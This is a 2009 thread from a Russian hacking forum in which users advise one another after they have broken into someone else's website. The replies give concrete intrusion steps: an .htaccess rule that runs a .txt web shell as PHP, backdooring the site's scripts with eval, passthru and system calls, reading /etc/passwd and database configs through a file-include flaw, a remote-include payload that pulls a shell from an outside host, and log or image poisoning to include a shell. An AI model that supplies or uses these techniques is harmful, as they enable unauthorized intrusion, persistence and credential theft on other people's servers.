 |
|
03.04.2009, 12:45
|
|
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
С нами:
10885346
Репутация:
2947
|
|
Сообщение от joomler
Ураааааааа, я проник к нему и загрузил шелл, только файл шелла с расширение .php
Как его текстового запускать?
Создаёшь файл '.htaccess'
внутри него:
Код:
<Files "text.txt">
AddType application/x-httpd-php .txt
</Files>
далее грузишь шелл с именем text.txt
А можно при помощи шелла добавить нового пользователя в бд?
Ищи в шеле конфиги к базе данных внутри скриптов (логин;пароль;имя_базы) .. коннекться и создавай что за хочешь..
Как вот лучше закрепиться на его акаунте?
Редактируй скрипты.. вставляй в них инклуды .. eval-ы passthru , system .. etc
Последний раз редактировалось slider; 03.04.2009 в 12:59..
|
|
|
03.04.2009, 13:07
|
|
Новичок
Регистрация: 16.03.2009
Сообщений: 24
С нами:
9029267
Репутация:
2
|
|
у меня такой вопрос,
что полезного можно запустить или прочитать с помощью php-инклуда кроме /etc/passwd ?
есть /etc/shadow но прав на чтение нету
|
|
|
|
03.04.2009, 13:09
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
С нами:
9837719
Репутация:
466
|
|
ищи какие нить конфиги и тд! Здесь мож глянуть шо читать http://forum.antichat.ru/thread49775.html
|
|
|
|
03.04.2009, 14:38
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от FarIZ
у меня такой вопрос,
что полезного можно запустить или прочитать с помощью php-инклуда кроме /etc/passwd ?
есть /etc/shadow но прав на чтение нету
1) Можешь найти ошибку и там будет путь: /home/host/site.ru/www/func/inc.php т.е. ты берешь путь home/host/site.ru/www/index.php и пробуешь прочитать файл. Если получится, то есть шанс найти конфиги коннекта к БД и подключиться!
2) Попробуй так: page.php?filename=http://shell.ru/shell.txt? - Почему .txt? Потому что веб сервер его интерпритирует как .php 
|
|
|
|
03.04.2009, 15:40
|
|
Новичок
Регистрация: 19.02.2009
Сообщений: 25
С нами:
9064855
Репутация:
10
|
|
Даа еслиб я знал как написать уязвимый код , я не программер(((
Может подскажите как сделать sql запрос для добавления нового пользователя в базу?
или как скрипт уязвимый подписать?
или литературку ?
|
|
|
|
03.04.2009, 15:58
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
Добавить юзера в БД:
Код:
mysql --user=root mysql
INSERT INTO user VALUES('localhost','monty',PASSWORD('some_pass'),
'Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y');
mysql> INSERT INTO user VALUES('%','monty',PASSWORD('some_pass'),
'Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y');
Подробнее здесь: http://www.phpclub.ru/mysql/doc/adding-users.html
Последний раз редактировалось -m0rgan-; 03.04.2009 в 16:18..
|
|
|
|
03.04.2009, 19:42
|
|
Новичок
Регистрация: 16.03.2009
Сообщений: 24
С нами:
9029267
Репутация:
2
|
|
Сообщение от Tigger
2) Попробуй так: page.php?filename=http://shell.ru/shell.txt? - Почему .txt? Потому что веб сервер его интерпритирует как .php удаленно подключить шелл вроде не выйдет потому что в инклуде у них сначала идет определенный путь а потом уже подставляется параметр
include(<путь>/<парам>_blabla.php)
|
|
|
|
03.04.2009, 19:48
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
Сообщение от FarIZ
у меня такой вопрос,
что полезного можно запустить или прочитать с помощью php-инклуда кроме /etc/passwd ?
есть /etc/shadow но прав на чтение нету
Можно прочитать конфиг коннекта к бд (если она имеется). После чего залогинится с ними для администрирования БД.
|
|
|
|
03.04.2009, 20:53
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
С нами:
10025299
Репутация:
412
|
|
Ещё можно попытаться заинклудить шелл - например из картинки(если есть возможность залить) или из логов апача...
|
|
|
|
03.04.2009, 21:12
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
S00pY, можно, но если есть права и полный путь, то лучше воспользоватся функцией into outfile.
Последний раз редактировалось -m0rgan-; 03.04.2009 в 22:35..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
